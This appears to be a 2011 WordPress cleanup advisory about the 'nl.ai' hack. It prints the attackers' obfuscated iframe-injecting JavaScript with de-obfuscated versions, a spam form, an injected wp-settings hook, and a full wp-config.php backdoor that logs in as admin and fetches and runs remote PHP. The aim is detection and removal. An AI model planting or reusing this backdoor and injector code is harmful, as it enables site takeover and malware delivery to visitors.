Malicious software hosted on nl.ai

The nl.ai hack is widespread on WordPress sites currently.  The hack consists of a block of malicious JavaScript being inserted (usually into the <head></head> section) into php pages on the site. Checking a page with the File Viewer Tool will show the code in a page. The malicious code appears like this in a page.

<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>

Which de-obfuscates to ->

function MakeFrameEx(){
  element = document.getElementById('yahoo_api');
  if (!element){
    var el = document.createElement('iframe');
    document.body.appendChild(el);
    el.id = 'yahoo_api';
    el.style.width = '1px';
    el.style.height = '1px';
    el.style.display = 'none';
    el.src = 'http://juyfdjhdjdgh.nl.ai/showthread.php?t=72241732'
  }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1))
 && ua.indexOf("windows") !=- 1){
  var t = setTimeout("MakeFrameEx()", 1000)
}

Note:  You will see some variations in the domain/sub-domain name. http://jhkdgh.coom.in/showthread.php?t=72241732 seems to be common also.  The hackers will have a number of domains set up with their malicious content and as Google flags one they will switch the src of the iframe to the next.

I have also seen a couple of WordPress sites where the block of script is inserted at the very beginning of the file, before the doctype declaration.  The code on these sites was quite different.

<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\'));',35,35,'|var||data||b16_map|result|b16_digits|ll|||charAt|for|if|new|length|Array|return|||hDcd|15| String|fromCharCode|function|write|256|match|0123456789abcdef|f0| 3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3 139393170783b20746f703a202d3239393870783b223e3c696672616d652077696474683d22342 2206865696768743d223422207372633d22687474703a2f2f677a646a706276622e6d796674702e 6f72672f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e|substr|document|join |false'.split('|'),0,{}))
</sc ript>

Which de-obfuscates to ->

document.write (s)  <div style="position: absolute; left: -1991px; top: -2998px;"><if rame width="4" height="4" src="http://gzdjpbvb.myftp.org/i.php?go=1"></iframe></div>

Update 11/09/2011:  A new variant of the code used in this hack has started to appear.  Instead of the Javascript above the hackers are now adding the code <form method="post" action="?" style="overflow: auto; width: 5pt; height: 1pt; position: absolute; display: none "><A HREF="http://businessactionforafrica.org/?kids" TARGET="_self">kids clothes</A></form> No doubt the domain being used to host the malicious content http://businessactionforafrica.org/?kids will change over time.

If you see something like

Fatal error< /b> : Cannot redeclare _765258526() (previously declared in /home/web1/www-docs/wp-content/plugins/simple-quotes/index.php(357) : eval()'d code:1) in < b> /home/web1/www-docs/wp-content/themes/yamidoo/footer.php(46) : eval()'d code< /b> on line < b> 1< /b> < br />

in the File Viewer you are hacked (still hacked?).  You need to clean up the code in those 2 files

/home/web1/www-docs/wp-content/plugins/simple-quotes/index.php

and

/home/web1/www-docs/wp-content/themes/yamidoo/footer.php

Note:  The paths in the error message are going to vary depending on the plugins/themes you are using.

On some sites the owners have reported that malicious php code has been placed in all files named index.php on the site.  The php code has been obfuscated, in most cases along the lines of

ncompress(base64_decode('eF6VlMmy ......
or gzuncompress(base64_decode('...............

There is a listing for a very simple script at  http://blog.aw-snap.info/p/simple-script-to-find-base64decode-in.html which you can up-load to your site and the script will check your files for any occurrences of the string base64_decode. The page includes a listing for the script and some brief instructions on how to install it on your site and use it.  There is no download so you have to copy the script, save it, and then up-load the file to your site.

The script will find all occurrences of base64_decode, malicious or NOT.  There is a webpage at Redleg's PHP base64 decode which can be used to try and decode the strings to see what they do.  Unfortunately it is sort of hit or miss on the decoding, depending on what the hackers have done, and sometimes the purpose of the decoded stuff is no more clear than the original code.  If you see something like $error_reporting=0; or error_reporting(0); that is usually a bad sign.  That code will "turn off" all error reporting and is frequently used by hackers to make it harder to trace their code.

This hack appears to be a continuation of the Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php  hack and the steps for cleaning it up are the same.

Check to see if you are using the timthumb.php / thumb.php utility and if you are make sure it is updated to the latest version.  http://timthumb.googlecode.com/svn/trunk/timthumb.php

Check your site for any of the following files

 /wp-admin/upd.php*
/wp-content/upd.php

/wp-content/data.php
/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
/wp-content/themes/*[your themes names]**/cache/.htaccess
/wp-content/themes/*[your themes names]/temp/[eab9c5e9815adc4c40a6557495eed6d3.php]
[or similar file names]
googleanalytics.php
custom_functions.php

* The upd.php names seem to be the most common.

*[your themes names]* You should check both your active theme and any inactive themes you may have left in place on your site. (And if you have any inactive themes/plugins delete the files!  Never leave old/unused files on your site.)

These files are malicious and should be deleted. Suggest you also install the script simple program to find files containing base64_decode linked under Useful(?) tools on this page and give it a try. Instructions for installing the script and using it or on the page.

Check the core WP files wp-settings.php and  wp-config.php for any malicious code. In most cases the hackers have been adding 100s of blank lines before their malicious code to try and hide its existence in the file. Check wp-settings.php for the following code

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);

and remove it.

You can verify that the malicious code is no longer being inserted with the File Viewer tool. If you are running WP Super Cache you will need to clear the cache before checking.

Check wp-config.php for the following code

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ''){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

and remove it.

Check your site for backdoors, rogue files or content in legitimate files that allow the hackers to access your site and/or change file content.  There are some good tips in this article Website security: How to find backdoor PHP shell scripts on a server Change ALL passwords, FTP, MySQL and your secret keys.

Once you have gotten your site cleaned up you MAY need to submit a review request to Google. Check to see if Google is flagging your site by opening the diagnostic page for your site at http://www.google.com/safebrowsing/diagnostic?site=yourdomain. If the page lists your site as suspicious then you will need to submit a review request to Google and get your site cleared before the warnings will be removed. If your site is listed as not suspicious then the warnings should disappear as soon as your site is cleaned up (you may need to delete browser history/cache).
 

As always any additional information you have about this hack would be greatly appreciated!

Update 11/09/2011:  I have started to see a small number of sites flagged for nl.ai, such as the one cited by Naoma in the comment below where, when the site is checked using the file viewer no malicious code is shown.  What I try to do in these cases is go back and check Google's cache of the sites pages and see if the code is present in the cached page.  So far the code has been present in the cached pages of all the sites I have checked.  What has happened in these cases? 1. The hosting service has cleaned up the site, removed the hack (and failed to notify the site owner).  If you are currently flagged with nl.ai and the file viewer does not show the code below suggest you use the viewer to check the cached version of your page.  Entering the URL http://webcache.googleusercontent.com/search?&q=cache%3Ahttp://www.yoursite.com in the File Viewer will request Google's cache of your page (If Google has it cached).  If you see the code in the cached version of your page and do not see it in the current version it is probable that your hosting service has removed the hack. Check with the support staff at your hosting service to see if they are in fact cleaning up the hack. If they have cleaned it up all you need to do is submit a malware review request to Google. 2. The hackers are evolving the hack and using new code. This hack does include a backdoor and as long as the backdoor is in place the hackers will "evolve" their code to try and hide it from malware scanners.